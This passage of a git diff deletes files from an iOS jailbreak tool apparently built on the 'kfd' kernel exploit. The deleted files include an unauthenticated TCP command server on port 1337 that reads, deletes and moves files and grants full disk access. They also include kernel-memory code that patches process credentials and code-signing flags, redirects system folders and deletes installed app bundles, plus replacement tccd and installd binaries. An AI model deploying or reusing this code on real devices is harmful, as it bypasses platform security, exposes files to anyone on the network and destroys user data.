- .foregroundColor(.secondary)
- .padding(.trailing, 8)
- }
- }
- }
- }
- .frame(height: 36)
- .padding(.horizontal, 10)
- }
- }
-}
diff --git a/kfd/JIT/DirtyJIT/TextField++.swift b/kfd/JIT/DirtyJIT/TextField++.swift
deleted file mode 100644
index 8e2e3166..00000000
--- a/kfd/JIT/DirtyJIT/TextField++.swift
+++ /dev/null
@@ -1,121 +0,0 @@
-//
-// TextField++.swift
-// DirtyJIT
-//
-// Created by Анохин Юрий on 09.03.2023.
-//
-
-import SwiftUI
-import Combine
-
-class TextFieldAlertViewController: UIViewController {
-
- /// Presents a UIAlertController (alert style) with a UITextField and a `Done` button
- /// - Parameters:
- /// - title: to be used as title of the UIAlertController
- /// - message: to be used as optional message of the UIAlertController
- /// - text: binding for the text typed into the UITextField
- /// - isPresented: binding to be set to false when the alert is dismissed (`Done` button tapped)
- init(title: String, message: String?, text: Binding, isPresented: Binding?) {
- self.alertTitle = title
- self.message = message
- self._text = text
- self.isPresented = isPresented
- super.init(nibName: nil, bundle: nil)
- }
-
- required init?(coder: NSCoder) {
- fatalError("init(coder:) has not been implemented")
- }
-
- // MARK: - Dependencies
- private let alertTitle: String
- private let message: String?
- @Binding private var text: String?
- private var isPresented: Binding?
-
- // MARK: - Private Properties
- private var subscription: AnyCancellable?
-
- // MARK: - Lifecycle
- override func viewDidAppear(_ animated: Bool) {
- super.viewDidAppear(animated)
- presentAlertController()
- }
-
- private func presentAlertController() {
- guard subscription == nil else { return } // present only once
-
- let vc = UIAlertController(title: alertTitle, message: message, preferredStyle: .alert)
-
- // add a textField and create a subscription to update the `text` binding
- vc.addTextField { [weak self] textField in
- guard let self = self else { return }
- self.subscription = NotificationCenter.default
- .publisher(for: UITextField.textDidChangeNotification, object: textField)
- .map { ($0.object as? UITextField)?.text }
- .assign(to: \.text, on: self)
- }
-
- // create a `Done` action that updates the `isPresented` binding when tapped
- // this is just for Demo only but we should really inject
- // an array of buttons (with their title, style and tap handler)
- let action = UIAlertAction(title: "Done", style: .default) { [weak self] _ in
- self?.isPresented?.wrappedValue = false
- }
- vc.addAction(action)
- present(vc, animated: true, completion: nil)
- }
-}
-
-struct TextFieldAlert {
-
- // MARK: Properties
- let title: String
- let message: String?
- @Binding var text: String?
- var isPresented: Binding? = nil
-
- // MARK: Modifiers
- func dismissable(_ isPresented: Binding) -> TextFieldAlert {
- TextFieldAlert(title: title, message: message, text: $text, isPresented: isPresented)
- }
-}
-
-extension TextFieldAlert: UIViewControllerRepresentable {
-
- typealias UIViewControllerType = TextFieldAlertViewController
-
- func makeUIViewController(context: UIViewControllerRepresentableContext) -> UIViewControllerType {
- TextFieldAlertViewController(title: title, message: message, text: $text, isPresented: isPresented)
- }
-
- func updateUIViewController(_ uiViewController: UIViewControllerType,
- context: UIViewControllerRepresentableContext) {
- // no update needed
- }
-}
-
-
-struct TextFieldWrapper: View {
-
- @Binding var isPresented: Bool
- let presentingView: PresentingView
- let content: () -> TextFieldAlert
-
- var body: some View {
- ZStack {
- if (isPresented) { content().dismissable($isPresented) }
- presentingView
- }
- }
-}
-
-extension View {
- func textFieldAlert(isPresented: Binding,
- content: @escaping () -> TextFieldAlert) -> some View {
- TextFieldWrapper(isPresented: isPresented,
- presentingView: self,
- content: content)
- }
-}
diff --git a/kfd/JIT/main.m b/kfd/JIT/main.m
deleted file mode 100644
index d42cfe4f..00000000
--- a/kfd/JIT/main.m
+++ /dev/null
@@ -1,224 +0,0 @@
-//
-// main.m
-// FileTroller
-//
-// Created by Nathan Senter on 3/7/23.
-//
-
-#import
-#import
-#import
-#import
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#import "kfd-Swift.h"
-
-void handle_client(int client_socket);
-
-int mainFDA(int argc, char *argv[]) {
- NSString * appDelegateClassName;
-
- if (argc == 2 && strcmp(argv[1], "--server") == 0) {
- int server_socket, client_socket, port;
- struct sockaddr_in server_addr, client_addr;
- socklen_t client_len = sizeof(client_addr);
-
- port = atoi("1337");
-
- if ((server_socket = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
- perror("Error creating socket");
- exit(1);
- }
-
- memset(&server_addr, 0, sizeof(server_addr));
- server_addr.sin_family = AF_INET;
- server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
- server_addr.sin_port = htons(port);
-
- if (bind(server_socket, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
- perror("Error binding socket");
- exit(1);
- }
-
- if (listen(server_socket, 5) < 0) {
- perror("Error listening for connections");
- exit(1);
- }
-
- printf("Server listening on port %d...\n", port);
-
- while (1) {
- if ((client_socket = accept(server_socket, (struct sockaddr *)&client_addr, &client_len)) < 0) {
- perror("Error accepting connection");
- exit(1);
- }
-
- handle_client(client_socket);
- }
-
- return 0;
- } else {
- @autoreleasepool {
- // Setup code that might create autoreleased objects goes here.
- appDelegateClassName = NSStringFromClass([AppDelegate class]);
- }
- return UIApplicationMain(argc, argv, nil, appDelegateClassName);
- }
-
-}
-
-void handle_client(int client_socket) {
- char buffer[1024];
- ssize_t num_bytes;
-
- while ((num_bytes = read(client_socket, buffer, sizeof(buffer))) > 0) {
- buffer[num_bytes - 1] = '\0';
-
- char command_output[1024];
-
- if (strncmp(buffer, "ls", 2) == 0) {
- DIR *dir = opendir(strtok(buffer + 3, " "));
- DIR *dir2 = opendir(".");
- if (dir == NULL) {
- struct dirent *entry;
- while ((entry = readdir(dir2)) != NULL) {
- snprintf(command_output, sizeof(command_output), "%s\n", entry->d_name);
- write(client_socket, command_output, strlen(command_output));
- }
- closedir(dir2);
- memset(buffer, 0, sizeof(buffer));
- }
- else {
- struct dirent *entry;
- while ((entry = readdir(dir)) != NULL) {
- snprintf(command_output, sizeof(command_output), "%s\n", entry->d_name);
- write(client_socket, command_output, strlen(command_output));
- }
- closedir(dir);
- memset(buffer, 0, sizeof(buffer));
- }
- } else if (strncmp(buffer, "mv", 2) == 0) {
- char *src = strtok(buffer + 3, " ");
- char *dest = strtok(NULL, " ");
- if (src == NULL || dest == NULL) {
- char *error_message = "Invalid command\n";
- memset(buffer, 0, sizeof(buffer));
- write(client_socket, error_message, strlen(error_message));
- continue;
- }
- if (rename(src, dest) == -1) {
- char *error_message = "Error renaming file";
- memset(buffer, 0, sizeof(buffer));
- write(client_socket, error_message, strlen(error_message));
- }
- } else if (strncmp(buffer, "cp", 2) == 0) {
- char *src = strtok(buffer + 3, " ");
- char *dest = strtok(NULL, " ");
- if (src == NULL || dest == NULL) {
- char *error_message = "Invalid command\n";
- memset(buffer, 0, sizeof(buffer));
- write(client_socket, error_message, strlen(error_message));
- continue;
- }
- FILE *source_file = fopen(src, "r");
- if (source_file == NULL) {
- char *error_message = "Error opening source file\n";
- memset(buffer, 0, sizeof(buffer));
- write(client_socket, error_message, strlen(error_message));
- continue;
- }
- FILE *dest_file = fopen(dest, "w");
- if (dest_file == NULL) {
- char *error_message = "Error creating destination file\n";
- fclose(source_file);
- memset(buffer, 0, sizeof(buffer));
- write(client_socket, error_message, strlen(error_message));
- continue;
- }
- char buffer[1024];
- size_t bytes_read;
- while ((bytes_read = fread(buffer, 1, sizeof(buffer), source_file)) > 0) {
- fwrite(buffer, 1, bytes_read, dest_file);
- }
- fclose(source_file);
- fclose(dest_file);
- char *success_message = "File copied successfully\n";
- memset(buffer, 0, sizeof(buffer));
- write(client_socket, success_message, strlen(success_message));
- } else if (strncmp(buffer, "cd", 2) == 0) {
- char *dir = strtok(buffer + 3, " ");
- if (dir == NULL) {
- char *error_message = "Invalid command\n";
- memset(buffer, 0, sizeof(buffer));
- write(client_socket, error_message, strlen(error_message));
- continue;
- }
- if (chdir(dir) == -1) {
- char *error_message = "Error changing dir\n";
- memset(buffer, 0, sizeof(buffer));
- write(client_socket, error_message, strlen(error_message));
- }
- } else if (strncmp(buffer, "id", 2) == 0) {
- uid_t uid = getuid();
- snprintf(command_output, sizeof(command_output), "uid=%d\n", uid);
- write(client_socket, command_output, strlen(command_output));
- } else if (strncmp(buffer, "exit", 2) == 0) {
- close(client_socket);
- } else if (strncmp(buffer, "touch", 5) == 0) {
- char *file_path = strtok(buffer + 6, " ");
- if (file_path == NULL) {
- char *error_message = "Invalid command\n";
- memset(buffer, 0, sizeof(buffer));
- write(client_socket, error_message, strlen(error_message));
- continue;
- }
- int fd = open(file_path, O_CREAT, 0644);
- if (fd == -1) {
- char *error_message = "Error creating file";
- write(client_socket, error_message, strlen(error_message));
- } else {
- close(fd);
- memset(buffer, 0, sizeof(buffer));
- }
- } else if (strncmp(buffer, "rm", 2) == 0) {
- char *filename = strtok(buffer + 3, " ");
- if (remove(filename) == 0) {
- char success_message[1024];
- snprintf(success_message, sizeof(success_message), "%s removed successfully.\n", filename);
- write(client_socket, success_message, strlen(success_message));
- } else {
- char error_message[1024];
- snprintf(error_message, sizeof(error_message), "Error removing %s\n", filename);
- write(client_socket, error_message, strlen(error_message));
- }
- } else if (strncmp(buffer, "cat", 3) == 0) {
- char *file = strtok(buffer + 4, " ");
- FILE *fp;
- char line[1024];
- fp = fopen(file, "r");
- if (fp != NULL) {
- while (fgets(line, sizeof(line), fp)) {
- write(client_socket, line, strlen(line));
- }
- fclose(fp);
- }
- } else if (strncmp(buffer, "tccd", 2) == 0) {
- grant_full_disk_access(^(NSError* error) {
- char command_output_tccd[1024];
- snprintf(command_output_tccd, sizeof(command_output_tccd), "grant_full_disk_access returned error: %s\n", [error.localizedDescription UTF8String]);
- write(client_socket, command_output_tccd, strlen(command_output_tccd));
- });
- } else {
- char *error_message = "Invalid command\n";
- write(client_socket, error_message, strlen(error_message));
- }
- }
-
- close(client_socket);
-}
diff --git a/kfd/KFD-manager.h b/kfd/KFD-manager.h
deleted file mode 100644
index 8abbfdc3..00000000
--- a/kfd/KFD-manager.h
+++ /dev/null
@@ -1,18 +0,0 @@
-//
-// KFD-manager.h
-// kfd
-//
-// Created by m1zole on 2023/09/16.
-//
-
-#ifndef KFD_manager_h
-#define KFD_manager_h
-
-uint64_t mountusrDir(void);
-uint64_t mountselectedDir(NSString* path);
-void unmountselectedDir(uint64_t orig_to_v_data, NSString* mntPath);
-void prepare(void);
-void do_tasks(void);
-bool check_mdc(void);
-
-#endif /* KFD_manager_h */
diff --git a/kfd/KFD-manager.m b/kfd/KFD-manager.m
deleted file mode 100644
index 2e45683b..00000000
--- a/kfd/KFD-manager.m
+++ /dev/null
@@ -1,229 +0,0 @@
-//
-// KFD-manager.m
-// kfd
-//
-// Created by m1zole on 2023/09/16.
-//
-
-#import
-#include
-#include "fun/vnode.h"
-#include "fun/utils.h"
-#include "fun/offsets.h"
-#include "fun/krw.h"
-#include "fun/proc.h"
-#include "fun/cs_blobs.h"
-#include "fun/fun.h"
-#include "fun/grant_full_disk_access.h"
-#include "fun/thanks_opa334dev_htrowii.h"
-#include "kfd-Swift.h"
-
-uint64_t orig_to_v_data = 0;
-
-uint64_t onlyFolderRedirect(uint64_t vnode, NSString *mntPath) {
- orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode);
- return orig_to_v_data;
-}
-
-uint64_t onlyUnRedirectFolder(uint64_t orig_to_v_data, NSString *mntPath) {
- funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data);
- return 0;
-}
-
-uint64_t do_getTask(char* process) {
- pid_t pid = getPidByName(process);
- uint64_t proc = getProc(pid);
- printf("[i] %s proc: 0x%llx\n", process, proc);
- uint64_t proc_ro = kread64(proc + off_p_proc_ro);
-
- /*
- * RO-protected flags:
- */
- #define TFRO_PLATFORM 0x00000400 /* task is a platform binary */
- #define TFRO_FILTER_MSG 0x00004000 /* task calls into message filter callback before sending a message */
- #define TFRO_PAC_EXC_FATAL 0x00010000 /* task is marked a corpse if a PAC exception occurs */
- #define TFRO_PAC_ENFORCE_USER_STATE 0x01000000 /* Enforce user and kernel signed thread state */
-
- uint32_t t_flags_ro = kread32(proc_ro + off_p_ro_t_flags_ro);
- printf("[i] %s proc->proc_ro->t_flags_ro: 0x%x\n", process, t_flags_ro);
-
- return 0;
-}
-
-void readtmplog(NSString* file) {
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-
- uint64_t var_tmp_vnode = getVnodeAtPathByChdir("/var/tmp");
-
- printf("[i] /var/tmp vnode: 0x%llx\n", var_tmp_vnode);
-
- uint64_t orig_to_v_data = createFolderAndRedirect(var_tmp_vnode, mntPath);
-
- NSError *error;
-
- printf("unredirecting from tmp\n");
-
- printf("reading log\n");
-
- NSLog(@"%@%@%@", NSHomeDirectory(),
@"/Documents/mounted/", file);
- NSString *log = [NSString stringWithContentsOfFile:[NSString stringWithFormat:@"%@%@%@", NSHomeDirectory(), @"/Documents/mounted/", file] encoding:NSUTF8StringEncoding error:&error];
- NSLog(@"%@", log);
-
- UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-}
-
-void getappslist(void) {
- printf("[i] chown /var/containers/Bundle/Application\n");
- funVnodeChownFolder("/var/containers/Bundle/Application", 501, 501);
-
- printf("[i] mounting /var/containers/Bundle/Application\n");
-
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-
- uint64_t containers_vnode = getVnodeAtPathByChdir("/var/containers/Bundle/Application");
- printf("[i] /var/containers/Bundle/Application vnode: 0x%llx\n", containers_vnode);
-
- orig_to_v_data = createFolderAndRedirect(containers_vnode, mntPath);
-
- NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/containers/Bundle/Application directory list:\n %@", dirs);
-
- UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-
- NSString *appstage1mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/appstage1/"];
- if (![[NSFileManager defaultManager] fileExistsAtPath:appstage1mntPath]) {
- [[NSFileManager defaultManager] createDirectoryAtPath:appstage1mntPath withIntermediateDirectories:YES attributes:nil error:nil];
- }
- NSString *appstage2mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/appstage2/"];
- if (![[NSFileManager defaultManager] fileExistsAtPath:appstage2mntPath]) {
- [[NSFileManager defaultManager] createDirectoryAtPath:appstage2mntPath withIntermediateDirectories:YES attributes:nil error:nil];
- }
-
- for(NSString *dir in dirs) {
- NSString *path = [NSString stringWithFormat:@"%s/%@", "/var/containers/Bundle/Application", dir];
- [[NSFileManager defaultManager] removeItemAtPath:path error:nil];
- NSLog(@"full path:\n %@", path);
-
//funVnodeChownFolder((char *) [path UTF8String], 501, 501);
- NSString *appmntPath = [NSString stringWithFormat:@"%@%@%@", NSHomeDirectory(), @"/Documents/appstage1/", dir];
- uint64_t containers_vnode = getVnodeAtPathByChdir((char *) [path UTF8String]);
- createFolderAndRedirect(containers_vnode, appmntPath);
- NSArray* targetdirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:appmntPath error:NULL];
- NSLog(@"appstage1 directory list: %@", targetdirs);
- }
-}
-
-
-void prepare(void) {
- _offsets_init();
-
- uint64_t kslide = get_kslide();
- uint64_t kbase = 0xfffffff007004000 + kslide;
- printf("[i] Kernel base: 0x%llx\n", kbase);
- printf("[i] Kernel slide: 0x%llx\n", kslide);
- uint64_t kheader64 = kread64(kbase);
- printf("[i] Kernel base kread64 ret: 0x%llx\n", kheader64);
-
- pid_t myPid = getpid();
- uint64_t selfProc = getProc(myPid);
- printf("[i] self proc: 0x%llx\n", selfProc);
-
- funUcred(selfProc);
- funProc(selfProc);
- printf("[i] pid: %d\n", getpid());
- funCSFlags("launchd");
- printf("[i] pid: %d\n", getpid());
- //funTask("kfd");
- mach_port_t host_self = mach_host_self();
- printf("[i] mach_host_self: 0x%x\n", host_self);
- //fun_ipc_entry_lookup(host_self);
-
- //kfd_patch_installd();
- //kfd_grant_full_disk_access(^(NSError* error) {
- // NSLog(@"[-] grant_full_disk_access returned error: %@", error);
- //});
-}
-
-uint64_t mountusrDir(void) {
-
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-
- uint64_t libexec_vnode = getVnodeAtPathByChdir("/var/containers/Bundle/Application/CF553F26-ED5C-44A5-8AE5-0C1267BFFA8C/Tips.app");
- printf("[i] folder vnode: 0x%llx\n", libexec_vnode);
-
- orig_to_v_data = createFolderAndRedirect(libexec_vnode, mntPath);
-
- NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"Tips directory list:\n %@", dirs);
-
- //UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-
- return orig_to_v_data;
-}
-
-void do_tasks(void) {
- _offsets_init();
-
- uint64_t kslide = get_kslide();
- uint64_t kbase = 0xfffffff007004000 + kslide;
- printf("[i] Kernel base: 0x%llx\n", kbase);
- printf("[i] Kernel slide: 0x%llx\n", kslide);
- uint64_t kheader64 = kread64(kbase);
- printf("[i] Kernel base kread64 ret: 0x%llx\n", kheader64);
-
- pid_t myPid = getpid();
- uint64_t selfProc = getProc(myPid);
- printf("[i] self proc: 0x%llx\n", selfProc);
-
- funUcred(selfProc);
- funProc(selfProc);
- printf("[i] pid: %d\n", getpid());
- //funCSFlags("kfd");
- //funTask("kfd");
- mach_port_t host_self = mach_host_self();
- printf("[i] mach_host_self: 0x%x\n", host_self);
- fun_ipc_entry_lookup(host_self);
- //fun_nvram_dump();
- //readtmplog(@"ps.log");
- usleep(1000);
- //getappslist();
- printf("[i] vnode: %llx\n", getVnodeAtPathByChdir("/var/containers/Bundle/Application/856A4230-C48C-4F6E-BAA4-E0BD1084AE6C/Books.app"));
- printf("[i] vnode: %llx\n", findChildVnodeByVnode(getVnodeAtPathByChdir("/var/containers/Bundle/Application/856A4230-C48C-4F6E-BAA4-E0BD1084AE6C/Books.app"), "Books.app"));
- printf("[i] vnode: %llx\n", findChildVnodeByVnode(getVnodeAtPathByChdir("/var/mobile"), "TCC.framework"));
-
- //funVnodeOverwriteFile("/System/Library/PrivateFrameworks/TCC.framework/Support/tccd", "/Developer/System/Library/PrivateFrameworks/TCC.framework/Support/tccd_ori");
- //kfd_grant_full_disk_access(^(NSError* error) {
- // NSLog(@"[-] grant_full_disk_access returned error: %@", error);
- //});
-}
-
-uint64_t mountselectedDir(NSString* path) {
- NSString *mntPath = [NSString stringWithFormat:@"%@%@%@", NSHomeDirectory(), @"/Documents", path];
- NSLog(@"%@", mntPath);
- NSLog(@"%@", path);
-
- uint64_t vnode = getVnodeAtPathByChdir((char *) [path UTF8String]);
-
- if (![[NSFileManager defaultManager] fileExistsAtPath:mntPath]) {
- printf("createFolderAndRedirect\n");
- orig_to_v_data = createFolderAndRedirect(vnode, mntPath);
- } else {
- printf("onlyFolderAndRedirect\n");
-
orig_to_v_data = onlyFolderRedirect(vnode, mntPath);
- }
- printf("[i] orig_to_v_data: %llx", orig_to_v_data);
- return orig_to_v_data;
-}
-
-void unmountselectedDir(uint64_t orig_to_v_data, NSString* mntPath) {
- printf("[i] orig_to_v_data: %llx", orig_to_v_data);
- onlyUnRedirectFolder(orig_to_v_data, mntPath);
-}
-
-bool check_mdc(void) {
- if (@available(iOS 16.2, *)) {
- return true;
- } else {
- return false;
- }
-}
-
diff --git a/kfd/LogView.swift b/kfd/LogView.swift
deleted file mode 100644
index 59cd32d4..00000000
--- a/kfd/LogView.swift
+++ /dev/null
@@ -1,206 +0,0 @@ -// -// LogView.swift -// Fugu15 -// -// Created by exerhythm on 29.03.2023. -// - -import SwiftUI -import SwiftfulLoadingIndicators - -struct LogView: View { - @StateObject var logger = Logger.shared - - @Binding var advancedLogsTemporarilyEnabled: Bool - @Binding var advancedLogsByDefault: Bool - - @State var lastScroll = Date() - - let viewAppearanceDate = Date() - - var advanced: Bool { - advancedLogsByDefault || advancedLogsTemporarilyEnabled - } - - struct LogRow: View { - @State var log: LogMessage - @State var scrollViewFrame: CGRect - - @State var shown = false - - var index: Int - var lastIndex: Int - - var isLast: Bool { - index == lastIndex - } - - var body: some View { - GeometryReader { proxy2 in - let k = k(for: proxy2.frame(in: .global).minY, in: scrollViewFrame) - - HStack { - switch log.type { - case .continuous: - ZStack { - let shouldShowCheckmark = !isLast - Image(systemName: "checkmark") - .opacity(shouldShowCheckmark ? 1 : 0) - LoadingIndicator(animation: .circleRunner, color: .white, size: .small) - .opacity(shouldShowCheckmark ? 0 : 1) - } - .offset(x: -4) - case .instant: - Image(systemName: "checkmark") - case .success: - Image(systemName: "lock.open") - .padding(.leading, 4) - case .error: - Image(systemName: "exclamationmark.triangle") - .foregroundColor(.yellow) - } - Text(log.text) - .font(.system(isLast ? .body : .subheadline)) - .foregroundColor(log.type == .error ? .yellow : .white) - .animation(.spring().speed(1.5), value: isLast) - .drawingGroup() - Spacer() - } - .opacity(k * (isLast ? 1 : 0.75)) - .blur(radius: 2.5 - k * 4) - .foregroundColor(.white) - .padding(.top, isLast ? 6 : 0) - .animation(.spring().speed(1.5), value: isLast) - } - .opacity(shown ? 
1 : 0) - .onAppear { - withAnimation(.spring().speed(3)) { - shown = true - } - } - } - - func k(for y: CGFloat, in rect: CGRect) -> CGFloat { - let h = rect.height - let ry = rect.minY - let relativeY = y - ry - return 1 - (h - relativeY) / h - } - } - - var body: some View { - ZStack { - GeometryReader { proxy1 in - ScrollViewReader { reader in - ScrollView { - if !advanced { - VStack { - Spacer() - .frame(minHeight: proxy1.size.height) - LazyVStack(spacing: 24) { - let frame = proxy1.frame(in: .global) - ForEach(Array(logger.userFriendlyLogs.enumerated()), id: \.element.id) { (i,log) in - LogRow(log: log, scrollViewFrame: frame, index: i, lastIndex: logger.userFriendlyLogs.count - 1) - } - } - .padding(.horizontal, 32) - .padding(.bottom, 64) - } - .id("RegularLogs") - .frame(minHeight: proxy1.size.height) - .transition(.opacity) - .frame(maxHeight: advanced ? 0 : nil) - .onChange(of: logger.userFriendlyLogs) { newValue in - if !advanced { - // give 0.5 seconds for a better feel - if viewAppearanceDate.timeIntervalSinceNow < -0.5 { - UISelectionFeedbackGenerator().selectionChanged() - } - - withAnimation { - reader.scrollTo("RegularLogs", anchor: .bottom) - } - } - } - .onChange(of: advanced) { newValue in - if !newValue { - withAnimation { - reader.scrollTo(logger.userFriendlyLogs.last!.id, anchor: .top) - } - } - } - } - - if advanced { - Text(logger.log) - .foregroundColor(.white) - .frame(minWidth: 0, - maxWidth: .infinity, - minHeight: 0, - maxHeight: .infinity, - alignment: .topLeading) - .padding(.bottom, 64) - .transition(.opacity) - .id("AdvancedText") - .onChange(of: logger.log) { newValue in - withAnimation { - if lastScroll.timeIntervalSinceNow < -0.25 { - lastScroll = Date() - // print("scroll") - reader.scrollTo("AdvancedText", anchor: .bottom) - } - } - } - .onAppear { -// withAnimation { -// reader.scrollTo("AdvancedText", anchor: .bottom) -// } - } - } - } - .animation(.spring(), value: advanced) - .contextMenu { - Button { - 
UIPasteboard.general.string = logger.log - } label: { - Label("Context_Menu_Copy_To_Clipboard", systemImage: "doc.on.doc") - } - } - } - } - } - .onAppear { -// let texts = """ -// Checking device compatibility -// Device is compatible with jailbreak -// Backing up device data -// Starting jailbreak installation -// Downloading jailbreak package -// Installing jailbreak package -// Jailbreak package installed -// Restarting device -// Device successfully restarted -// Cydia app installed -// Checking if you are a human -// Verifying using Captcha -// Human Verification failed -// Complete these 3 surveys to continue -// Jailbreak successful -// """ -// let c = texts.components(separatedBy: "\n") -// Timer.scheduledTimer(withTimeInterval: 0.2, repeats: true) { t in -// Logger.log(c.randomElement()!, type: [LogMessage.LogType.continuous, .error, .instant].randomElement()!, isStatus: Int.random(in: 1...20) == 1) -// Logger.log(c.randomElement()!, type: [LogMessage.LogType.continuous, .error, .instant].randomElement()!, isStatus: Int.random(in: 1...20) == 1) -// Logger.log(c.randomElement()!, type: [LogMessage.LogType.continuous, .error, .instant].randomElement()!, isStatus: Int.random(in: 1...20) == 1) -// Logger.log(c.randomElement()!, type: [LogMessage.LogType.continuous, .error, .instant].randomElement()!, isStatus: Int.random(in: 1...20) == 1) -// } - } - } -} - -struct LogView_Previews: PreviewProvider { - static var previews: some View { - LogView(advancedLogsTemporarilyEnabled: .constant(true), advancedLogsByDefault: .constant(false)) - .background(.clear) - } -} diff --git a/kfd/Logger.swift b/kfd/Logger.swift deleted file mode 100644 index 791b9a51..00000000 --- a/kfd/Logger.swift +++ /dev/null 
@@ -1,68 +0,0 @@ -// -// Logger.swift -// Fugu15 -// -// Created by exerhythm on 29.03.2023. -// - -import SwiftUI - -struct LogMessage: Equatable, Identifiable { - var id = UUID() - var text: String - var type: LogType - - enum LogType: RawRepresentable { - case instant - case continuous - case success - case error - - var rawValue: String { - switch self { - case .instant, .continuous: - return "[*]" - case .success: - return "[+]" - case .error: - return "E:" - } - } - - init?(rawValue: String) { - switch rawValue { - case "[*]": - self = .instant - case "[+]": - self = .success - case "E:": - self = .error - default: - return nil - } - } - } -} - -class Logger: ObservableObject { - @Published var userFriendlyLogs: [LogMessage] = [] - @Published var log: String = "" - - static var shared = Logger() - - /** - * Add a string to log view. - * - * - Parameter text: The text to display - * - Parameter isContinuous: Determines whether the action is instant or continuous, and if a spinner next to text should be shown - * - Parameter isStatus: Should the log be displayed to users who have "Simple Logs" option turned on - */ - static func log(_ obj: Any, type: LogMessage.LogType = .continuous, isStatus: Bool = false) { - let text = String(describing: obj) - print(text) - shared.log += "\n\(type.rawValue) \(text)" - if isStatus { - shared.userFriendlyLogs.append(.init(text: NSLocalizedString(text, comment: "Jailbreak Status"), type: type)) - } - } -} diff --git a/kfd/filemanager_by_akusio b/kfd/filemanager_by_akusio deleted file mode 120000 index 63fc715c..00000000 --- a/kfd/filemanager_by_akusio +++ /dev/null @@ -1 +0,0 @@ -../MiniRootFileManager15/filemanager_by akusio \ No newline at end of file diff --git a/kfd/files/PersistenceHelper_Embedded b/kfd/files/PersistenceHelper_Embedded deleted file mode 100644 index 9fbec600..00000000 Binary files a/kfd/files/PersistenceHelper_Embedded and /dev/null differ 
diff --git a/kfd/files/installd b/kfd/files/installd
deleted file mode 100755
index 2ef4b0b5..00000000
Binary files a/kfd/files/installd and /dev/null differ
diff --git a/kfd/files/tccd b/kfd/files/tccd
deleted file mode 100755
index 7cfb5ba0..00000000
Binary files a/kfd/files/tccd and /dev/null differ
diff --git a/kfd/fun/cs_blobs.h b/kfd/fun/cs_blobs.h
deleted file mode 100644
index 7f40f3f7..00000000
--- a/kfd/fun/cs_blobs.h
+++ /dev/null
@@ -1,17 +0,0 @@
-//
-// cs_blobs.h
-// kfd
-//
-// Created by Seo Hyun-gyu on 2023/08/05.
-//
-
-#ifndef cs_blobs_h
-#define cs_blobs_h
-
-#include
-
-uint64_t fun_cs_blobs(char* execPath);
-uint64_t fun_proc_dump_entitlements(uint64_t proc);
-uint64_t fun_vnode_dump_entitlements(const char* path);
-
-#endif /* cs_blobs_h */
diff --git a/kfd/fun/cs_blobs.m b/kfd/fun/cs_blobs.m
deleted file mode 100644
index 24482fc0..00000000
--- a/kfd/fun/cs_blobs.m
+++ /dev/null
@@ -1,186 +0,0 @@ -// -// cs_blobs.c -// kfd -// -// Created by Seo Hyun-gyu on 2023/08/05. -// - -#include "cs_blobs.h" -#include "krw.h" -#include "offsets.h" -#include "vnode.h" -#include "utils.h" -#include "thanks_opa334dev_htrowii.h" - -extern const uint8_t *der_decode_plist(CFAllocatorRef allocator, CFTypeRef* output, CFErrorRef *error, const uint8_t *der_start, const uint8_t *der_end); - -typedef struct __SC_GenericBlob { - uint32_t magic; /* magic number */ - uint32_t length; /* total length of blob */ - char data[]; -} CS_GenericBlob -__attribute__ ((aligned(1))); - - -uint32_t convertToLittleEndian(uint32_t num) { - return ((num & 0x000000FF) << 24) | - ((num & 0x0000FF00) << 8) | - ((num & 0x00FF0000) >> 8) | - ((num & 0xFF000000) >> 24); -} - -//https://github.com/opa334/Dopamine/blob/master/BaseBin/libjailbreak/src/util.m#L656 -NSMutableDictionary *DEREntitlementsDecode(uint8_t *start, uint8_t *end) -{ - if (!start || !end) return nil; - if (start == end) return nil; - - CFTypeRef plist = NULL; - CFErrorRef err; - der_decode_plist(NULL, &plist, &err, start, end); - - if (plist) { - if (CFGetTypeID(plist) == CFDictionaryGetTypeID()) { - NSMutableDictionary *plistDict = (__bridge_transfer id)plist; - return plistDict; - } - else if (CFGetTypeID(plist) == CFDataGetTypeID()) { - // This code path is probably never used, but I decided to implement it anyways - // Because I saw in disassembly that there is a possibility for this to return data - NSData *plistData = (__bridge_transfer id)plist; - NSPropertyListFormat format; - NSError *decodeError; - NSMutableDictionary *result = ((NSDictionary *)[NSPropertyListSerialization propertyListWithData:plistData options:0 format:&format error:&decodeError]).mutableCopy; - if (!result) { - printf("[-] Error decoding DER: %s\n", decodeError.description.UTF8String); - } - return result; - } - } - return nil; -} - -uint64_t fun_cs_blobs(char *execPath) { - - uint64_t ubc_info = kread64(getVnodeAtPath(execPath) + 
